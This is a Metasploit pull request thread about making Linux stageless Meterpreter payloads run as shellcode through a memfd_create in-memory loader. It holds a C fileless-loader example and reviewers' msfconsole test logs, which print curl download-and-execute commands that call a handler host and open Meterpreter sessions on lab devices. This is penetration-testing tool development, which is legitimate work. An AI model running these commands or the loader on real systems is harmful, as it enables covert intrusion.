
Conversation

@dledda-r7 (Contributor) commented Jan 10, 2025

This PR fixes the issue with the Linux stageless Meterpreter.
Issue: #19670

Issue Description

The stageless Linux Meterpreters are ELF files that cannot be used as a standard stageless shellcode payload.

Staged vs Stageless Linux Meterpreter

Staged

The Linux staged Meterpreter is divided into 3 components:

  • A stager (connects back to msf to download the next stage)
  • An intermediate stager that downloads the ELF into an RWX mmap, sets up the stack and jumps to the e_entry of the ELF
  • The Process-Hollowing-friendly version of mettle's ELF

This version of the ELF is generated when we build mettle using the following tool: elf2bin

Stageless

The stageless mettle payload is the ELF file (a standard ELF) with the patched args.

Code Handling Staged vs Stageless

Mettle main.c

	/*
	 * Check to see if we were injected by metasploit | staged
	 */
	if (strcmp(argv[0], "m") == 0) {
		flags |= PAYLOAD_INJECTED;

		/*
		 * There is a fd sitting here, trust me
		 */
		int fd = (int)((long *)argv)[1];
		char *uri;
		if (asprintf(&uri, "fd://%d", fd) > 0) {
			struct c2 *c2 = mettle_get_c2(m);
			c2_add_transport_uri(c2, uri);
			free(uri);
		}
		parse_default_args(m, flags);
	} else {

#ifndef HAVE_SETPROCTITLE
		/* Prepare for later setproctitle emulation */
		saved_argv = calloc(argc + 1, sizeof(*saved_argv));
		for (int i = 0; i < argc; i++) {
			saved_argv[i] = strdup(argv[i]);
		}
		compat_init_setproctitle(argc, argv);
		argv = saved_argv;
#endif

		parse_default_args(m, flags);    // <- MSFVENOM REPLACES THE DEFAULT OPTIONS PARSED HERE
		if (parse_cmdline(argc, argv, m, flags)) {
			return -1;
		}
	}

Solution

For each architecture, a shellcode implementing this technique was made.
NOTE: This technique works only with kernel >= 3.17.

Instead of delivering the ELF only, the raw shellcode is composed of the architecture-specific in-memory-loader shellcode with the ELF file appended at the end of it.

Super thanks to @msutovsky-r7

Architectures fixed by this PR:

  • linux/x86
  • linux/x64
  • linux/armle
  • linux/armbe (emulated)
  • linux/aarch64
  • linux/mips
  • linux/mipsel (to check device availability)
  • linux/mips64 (find target with kernel 3.17 / updated one of the targets)
  • linux/ppc ( to be removed)
  • linux/ppc64le (emulated)
  • linux/ppce500v2
  • linux/zarch (emulated)

What is inside the PR and How to test it

  • <arch>/in_memory_loader.rb includes the architecture-specific shellcode to be prepended to the ELF binary.
  • An empty <arch>/prepends.rb mixin is added for the missing architectures.
  • Template ELF binaries and sources for the missing architectures.
  • A Mettle-specific datastore option for selecting binary compatibility with 2.6 or 3.17 kernels.
  • A warning is displayed if a prepend is applied when the kernel datastore option is 2.6.
  • Modification of the meterpreter_reverse.erb template for payload generation.

What to test

  • Ensure the ELF delivered when MeterpreterLinuxMinKernel is 2.6+ is the same as before.
  • Ensure the ELF delivered when MeterpreterLinuxMinKernel is 3.17 uses the correct ELF template and executes on a compatible target.
  • Ensure the prepends are applied to the payload when MeterpreterLinuxMinKernel is 3.17; otherwise a warning is shown.
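The loader technique the PR describes (memfd_create an anonymous file, write the appended ELF into it, execute it in place), written out in C as an added example rather than as the PR's per-architecture shellcode. This is not mettle's or the PR's code. It assumes a Linux host with /proc mounted and uses the system's /bin/sh as a stand-in for the Mettle ELF bytes that follow the loader; `memfd_from_bytes`, `exec_memfd`, `run_payload_from_memory` and `demo` are names chosen here. Mode 1 runs the descriptor directly with execveat(AT_EMPTY_PATH) (Linux >= 3.19); mode 0 takes the /proc/self/fd/<N> + execve route that the thread later moves back to, which needs only memfd_create (Linux >= 3.17).

```c
/* Added example, not mettle's or the PR's code: the in-memory-loader
 * technique in C instead of per-architecture shellcode. Assumes Linux with
 * /proc mounted; /bin/sh stands in for the ELF the PR appends to the loader. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>

/* Anonymous memfd holding the payload bytes. The empty name is why the
 * exec'd process appears as "/memfd: (deleted)" in gdb. Raw syscalls keep
 * the sequence identical to what the shellcode must do. */
static int memfd_from_bytes(const unsigned char *buf, size_t len)
{
    int fd = (int)syscall(SYS_memfd_create, "", MFD_CLOEXEC);  /* Linux >= 3.17 */
    if (fd < 0) return -1;
    for (size_t off = 0; off < len;) {
        ssize_t n = write(fd, buf + off, len - off);
        if (n < 0 && errno == EINTR) continue;
        if (n <= 0) { close(fd); return -1; }
        off += (size_t)n;
    }
    return fd;
}

/* Replace the process image with the file behind fd; returns only on failure.
 * use_execveat=1: execveat(fd, "", ..., AT_EMPTY_PATH), Linux >= 3.19.
 * use_execveat=0, or ENOSYS: the "itoa + execve" route via /proc/self/fd/N.
 * MFD_CLOEXEC is safe for an ELF (the kernel maps the image before
 * close-on-exec runs) but breaks a "#!" script, whose interpreter re-opens
 * /dev/fd/N after the exec. */
static void exec_memfd(int fd, char *const argv[], char *const envp[],
                       int use_execveat)
{
#ifdef SYS_execveat
    if (use_execveat) {
        syscall(SYS_execveat, fd, "", argv, envp, AT_EMPTY_PATH);
        if (errno != ENOSYS) return;
    }
#endif
    char path[32];
    snprintf(path, sizeof path, "/proc/self/fd/%d", fd);
    execve(path, argv, envp);
}

/* Fork, load the bytes into a memfd in the child and exec them. Returns the
 * child's exit status, 126 if no exec path worked, -1 on setup failure. */
int run_payload_from_memory(const unsigned char *buf, size_t len,
                            char *const argv[], int use_execveat)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        int fd = memfd_from_bytes(buf, len);
        if (fd < 0) _exit(127);
        char *envp[] = { NULL };
        exec_memfd(fd, argv, envp, use_execveat);
        _exit(126);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Slurp a file; stands in for the ELF bytes that follow the loader. */
static unsigned char *read_file(const char *path, size_t *len)
{
    FILE *f = fopen(path, "rb");
    if (!f) return NULL;
    long sz = fseek(f, 0, SEEK_END) == 0 ? ftell(f) : -1;
    unsigned char *buf = sz > 0 ? malloc((size_t)sz) : NULL;
    rewind(f);
    if (buf && fread(buf, 1, (size_t)sz, f) != (size_t)sz) { free(buf); buf = NULL; }
    fclose(f);
    *len = buf ? (size_t)sz : 0;
    return buf;
}

/* Run the system shell from an anonymous file and have it exit with 42. */
int demo(int use_execveat)
{
    size_t len;
    unsigned char *elf = read_file("/bin/sh", &len);
    if (!elf) return -1;
    char *argv[] = { "sh", "-c", "exit 42", NULL };
    int rc = run_payload_from_memory(elf, len, argv, use_execveat);
    free(elf);
    return rc;
}

int main(void)
{
    printf("execveat: %d, /proc/self/fd + execve: %d\n", demo(1), demo(0));
    return 0;
}
```

Build with `cc -o memfd_loader memfd_loader.c` and run it; both modes report 42. While the child is alive, its /proc/<pid>/exe link reads "/memfd: (deleted)", the same name that shows up in the gdb transcript later in this thread. The stageless Mettle ELF must not be handed "m" as argv[0], since main.c above treats that as the injected/staged case and expects a file descriptor in argv[1].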

@msutovsky-r7 self-assigned this Jan 14, 2025
@dledda-r7 force-pushed the fix/mettle-stageless-payload branch from b3f3b8c to 128ac84 on February 10, 2025 08:11
@smcintyre-r7 added the enhancement and rn-payload-enhancement (release notes for enhanced payloads) labels Feb 14, 2025
@dledda-r7 marked this pull request as ready for review February 14, 2025 11:36
@dledda-r7 changed the title from "[WIP] Fix Linux Stageless Payload to be Shellcodes" to "Fix Linux Stageless Payload to be Shellcodes" Feb 14, 2025
@msutovsky-r7 removed their assignment Feb 14, 2025
@bwatters-r7 self-assigned this Apr 8, 2025
@bwatters-r7 (Contributor)

This makes a lot of sense- my only complaint is that we need to comment the asm a lot more, especially when you're doing shenanigans. 😆

@bwatters-r7 (Contributor)

Also, what are you using to test this? Do you have an ELF that supports injection, or are you only testing by creating an ELF stager from the shellcode?

@msutovsky-r7 (Contributor)

Also, what are you using to test this? Do you have an ELF that supports injection, or are you only testing by creating an ELF stager from the shellcode?

I generated the ELF file using msfvenom and, for actual testing, I mostly used qemu-static-[arch]. For some architectures that was a bit of a problem, like s390, so in that case I had a Linux OS running through qemu. So generally, for testing, I used qemu.

@msutovsky-r7 force-pushed the fix/mettle-stageless-payload branch from 2025792 to 56c4506 on May 12, 2025 09:58
@bwatters-r7 (Contributor) left a review: Minor cheat sheet additions

size_l = size & 0x0000ffff
in_memory_loader = [
# "call" 0x1004, address of the next instruction is stored in $ra
0x04110000, # 0x1000: bal 0x1004 0x04110000
Contributor commented on the lines above:

For my own curiosity:
In the ARM and AMD64 assembly, you're doing the memfd_create before hopping to the end and calling a branch and link, so the return address is after our shellcode.
In MIPS you're doing the branch and link before the memfd_create, giving a return address before our shellcode.
In PPC, you're doing the branch and link before the memfd_create, but the RA is still after everything, so the RA is again at the end of our shellcode.
Is there a reason to have the RA point to the beginning, middle, or end of shellcode based on architecture?

Contributor Author replied:

With MIPS I was having some issues doing it in the canonical way (which I would consider the x64 one). Also, before the changes to execveat I was using the $ra to do the itoa first and then adding +2 to point to the start of the ELF at the end of the shellcode, so it really didn't matter where it was pointing first, as I had to do some offset manipulation anyway. If you think it is a blocker we can standardize it. Looking at other shellcodes/stubs in the framework, I really doubt anybody will ever contribute to them, but I am open to making the code more standardized if you think it is worth it.

Contributor replied:

Not a blocker at all- I just noticed a difference and did not know why it would make a difference, so I figured I'd ask.

app << appends_map.fetch(name) if datastore[name]
end
if ds['MeterpreterLinuxMinKernel'] == '2.6+' && (!pre.empty? || !app.empty?) && !staged?
print_warning('Prepends options only works with MeterpreterLinuxMinKernel = 3.17+.')
Contributor commented on the lines above:

Suggested change
print_warning('Prepends options only works with MeterpreterLinuxMinKernel = 3.17+.')
print_warning('Prepend options only work with MeterpreterLinuxMinKernel = 3.17+.')

@bwatters-r7 (Contributor)

x64

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use payload/cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 3.17+ 
MeterpreterLinuxMinKernel => 3.17+
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > set prependsetuid true 
prependsetuid => true
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > to_handler
[*] Command served: curl -so ./YcZpMZsOWVJ http://10.5.135.201:8080/s-Ca9BmTKo-IpFX8XiUd8w;chmod +x ./YcZpMZsOWVJ;./YcZpMZsOWVJ&
[*] Command to run on remote host: curl -s http://10.5.135.201:8080/aoG3_q_U5dSCB61zrJpJEQ|sh
[*] Payload Handler Started as Job 2
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /s-Ca9BmTKo-IpFX8XiUd8w
[*] Adding resource /aoG3_q_U5dSCB61zrJpJEQ
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Client 10.5.134.164 requested /aoG3_q_U5dSCB61zrJpJEQ
[*] Sending payload to 10.5.134.164 (curl/7.81.0)
[*] Client 10.5.134.164 requested /s-Ca9BmTKo-IpFX8XiUd8w
[*] Sending payload to 10.5.134.164 (curl/7.81.0)
[*] Meterpreter session 1 opened (10.5.135.201:4585 -> 10.5.134.164:41258) at 2025-06-10 14:44:18 -0500

msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.134.164
OS           : Ubuntu 22.04 (Linux 6.8.0-1028-azure)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

@bwatters-r7 (Contributor) commented Jun 10, 2025

AARCH64

msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 3.17+ 
MeterpreterLinuxMinKernel => 3.17+
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set prependsetuid true
prependsetuid => true
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set verbose true
verbose => true
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./SDeLtHAov http://10.5.135.201:8080/TQMDQzG-j3qlgupsFHwcUQ;chmod +x ./SDeLtHAov;./SDeLtHAov&
[*] Payload Handler Started as Job 3
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /TQMDQzG-j3qlgupsFHwcUQ
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Client 10.5.132.214 requested /TQMDQzG-j3qlgupsFHwcUQ
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Meterpreter session 2 opened (10.5.135.201:4585 -> 10.5.132.214:48214) at 2025-06-10 14:47:11 -0500

msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 10.5.132.214
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: kali

@bwatters-r7 (Contributor)

ARMLE

msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > set meterpreterlinuxminkernel 3.17+ 
meterpreterlinuxminkernel => 3.17+
msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > set prependsetuid true 
prependsetuid => true
msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./WZmRLbLOTRP http://10.5.135.201:8080/OcFXJxS3XJGwQI9E1fvCLA;chmod +x ./WZmRLbLOTRP;./WZmRLbLOTRP&
[*] Payload Handler Started as Job 0
msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /OcFXJxS3XJGwQI9E1fvCLA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.132.212 requested /OcFXJxS3XJGwQI9E1fvCLA
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.212:42594) at 2025-06-11 14:01:42 -0500

msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.212
OS           : Debian  (Linux 5.15.44-Re4son-v7+)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > getuid

@bwatters-r7 (Contributor) commented Jun 11, 2025

MIPSLE

This fails with segfault. I'm running it on a router, so I cannot get GDB installed, but gdb server works.

(gdb) target remote 10.5.134.135:6785
Remote debugging using 10.5.134.135:6785
Reading /home/ubnt/nHMEUdqNk from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /home/ubnt/nHMEUdqNk from remote target...
Reading symbols from target:/home/ubnt/nHMEUdqNk...
(No debugging symbols found in target:/home/ubnt/nHMEUdqNk)
Reading /usr/lib/debug/.build-id/5a/dc2f32cfab9c3295eff7905db52e01ef1771f0.debug from remote target...

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Enable debuginfod for this session? (y or [n]) y
Debuginfod has been enabled.
To make this setting permanent, add 'set debuginfod enabled on' to .gdbinit.
0x00400054 in ?? ()
(gdb) start
The "remote" target does not support "run".  Try "help target" or "continue".
(gdb) continue
Continuing.
process 3834 is executing new program: /memfd: (deleted)
Reading /memfd: (deleted) from remote target...
warning: "target:/memfd: (deleted)": could not open as an executable file: No such file or directory.
Reading /memfd: (deleted) from remote target...
warning: `target:/memfd: (deleted)': can't open to read symbols: No such file or directory.

Program received signal SIGSEGV, Segmentation fault.
0x77fb5dd0 in ?? ()

Linux version:

ubnt@ubnt:~$ Linux ubnt 4.14.54-UBNT #1 SMP Thu Jun 15 09:00:10 UTC 2023 mips GNU/Linux

EDIT
The "legacy" meterpreter works.

msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 2.6+ 
MeterpreterLinuxMinKernel => 2.6+
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set prependsetuid false
prependsetuid => false
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./ViIsYiXmd http://10.5.135.201:8080/CT_Drzu24xtplYEAbOltEg;chmod +x ./ViIsYiXmd;./ViIsYiXmd&
[*] Payload Handler Started as Job 3
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /CT_Drzu24xtplYEAbOltEg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.134.135 requested /CT_Drzu24xtplYEAbOltEg
[*] Sending payload to 10.5.134.135 (curl/7.52.1)
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.135:33584) at 2025-06-11 16:58:28 -0500

@dledda-r7 force-pushed the fix/mettle-stageless-payload branch from 5192b65 to 0407bb7 on June 11, 2025 21:57
@msutovsky-r7 (Contributor)
(quotes @bwatters-r7's MIPSLE segfault report and gdb output from the comment above)

It's causing segfault on this instruction:

0x77fb5dd0    lb     $v0, ($a0)     <Cannot dereference [0]>

So the issue is with Meterpreter itself - on qemu, it seems to be working though.

UPDATE:
It seems like the issue is with the execveat instruction, which works, but somehow it's not. Everything works as expected until that syscall: running the file descriptor from a different shell will run Meterpreter. But somehow, spawning the process with execveat breaks something and the Meterpreter doesn't work.

@dledda-r7 force-pushed the fix/mettle-stageless-payload branch from c0b3f51 to 38b63f5 on September 23, 2025 09:51
#
# Linux ppc prepends
#
module Msf::Payload::Linux::Mipsle::Prepends
Contributor commented on the lines above:

I am, in fact, crazy


# XXX: Add remaining AARCH64 systems here
end
if arch.index(ARCH_PPC) && plat.index(Msf::Module::Platform::OSX)
Contributor commented on the lines above:

If we are going to remove the PPC, do we need the ppc files in here? We have templates, prepends, payloads, and a loader in this PR?
Also, it might be a good idea to change the error message above, since the problem is not that we don't support the arch or platform, we don't support the Minimum kernel level:

msf payload(cmd/linux/http/ppc/meterpreter_reverse_tcp) > set PayloadLinuxMinKernel 3.17+ 
PayloadLinuxMinKernel => 3.17+
msf payload(cmd/linux/http/ppc/meterpreter_reverse_tcp) > to_handler
[-] Exploit failed: Failed to generate an executable payload due to an invalid platform or arch.
msf payload(cmd/linux/http/ppc/meterpreter_reverse_tcp) > set PayloadLinuxMinKernel 2.6+ 
PayloadLinuxMinKernel => 2.6+
msf payload(cmd/linux/http/ppc/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./loAlOlFnqst http://10.5.135.201:8080/JY-6pdFD6VFwW21Ds-tzNQ;chmod +x ./loAlOlFnqst;./loAlOlFnqst&

@bwatters-r7 (Contributor)

msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./MYTRDUzk http://10.5.135.201:8080/8Z4ZAzIC6g6LyRMRHt_ybA;chmod +x ./MYTRDUzk;./MYTRDUzk&
[*] Payload Handler Started as Job 2
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.132.224 requested /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.224:43288) at 2025-10-28 16:04:18 -0500

msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           : Debian 9.13 (Linux 4.9.79-UBNT)
Architecture : mips64
BuildTuple   : mips64-linux-muslsf
Meterpreter  : mips64/linux
meterpreter > getuid
Server username: ubnt
meterpreter > exit
[*] Shutting down session: 1

[*] 10.5.132.224 - Meterpreter session 1 closed.  Reason: User exit
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > [*] 10.5.132.224 - Meterpreter session 1 closed.  Reason: Died

msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > set PayloadLinuxMinKernel 3.17 
PayloadLinuxMinKernel => 3.17
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./SsMEzUcPWTv http://10.5.135.201:8080/8Z4ZAzIC6g6LyRMRHt_ybA;chmod +x ./SsMEzUcPWTv;./SsMEzUcPWTv&
[*] Payload Handler Started as Job 3
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /8Z4ZAzIC6g6LyRMRHt_ybA
[-] Exploit failed: RuntimeError unknown: Failed to add resource
bad-config: Resource collision detected. Set FETCH_URIPATH to a different value to continue.
Interrupt: use the 'exit' command to quit
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./SMwsvbqbCFdr http://10.5.135.201:8080/8Z4ZAzIC6g6LyRMRHt_ybA;chmod +x ./SMwsvbqbCFdr;./SMwsvbqbCFdr&
[*] Payload Handler Started as Job 4
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.132.224 requested /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Client 10.5.132.224 requested /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Sending payload to 10.5.132.224 (curl/7.52.1)

ubnt@ubnt:~$ curl -so ./SMwsvbqbCFdr http://10.5.135.201:8080/8Z4ZAzIC6g6LyRMRHt_ybA
ubnt@ubnt:~$ ls -l
total 3304
-rwxr-xr-x    1 ubnt     users      1685392 Jan  2 02:05 MYTRDUzk
-rwxr-xr-x    1 ubnt     users      1685612 Jan  2 02:08 SMwsvbqbCFdr
ubnt@ubnt:~$ chmod 755 SMwsvbqbCFdr
ubnt@ubnt:~$ ./SMwsvbqbCFdr
Bus error
ubnt@ubnt:~$ 

@bwatters-r7 (Contributor): [image attachment]

@dledda-r7 (Contributor Author)

@bwatters-r7 we are going to replace execveat back with the itoa + execve; this might take a while. After that we will need to retest everything.


Labels: enhancement, payload, rn-payload-enhancement (release notes for enhanced payloads)

5 participants